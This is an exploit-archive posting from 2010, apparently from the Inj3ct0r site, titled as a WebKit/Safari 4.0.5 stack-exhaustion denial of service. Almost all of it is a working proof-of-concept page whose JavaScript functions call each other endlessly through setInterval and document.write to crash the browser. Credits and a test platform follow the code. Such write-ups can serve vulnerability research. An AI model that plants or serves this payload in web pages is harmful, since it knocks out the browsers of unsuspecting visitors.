Webkit (Safari v4.0.5) Stack Exhaustion DoS
Posted on 27 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Webkit (Safari v4.0.5) Stack Exhaustion DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== Webkit (Safari v4.0.5) Stack Exhaustion DoS =========================================== <html> <script> loop1(); var a = "<blink>"; function loop1() { document.write(a); setInterval(loop2,0); } function loop2() { document.write(a); setInterval(loop1,0); } </script> <body> Webkit (Safari) Stack Exhaustion DoS Found By: Dr_IDE Credit To: Mattias Karlsson Reference: http://inj3ct0r.com/exploits/12001 Tested On: Windows 7 + Safari 4.0.5 </body> </html> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>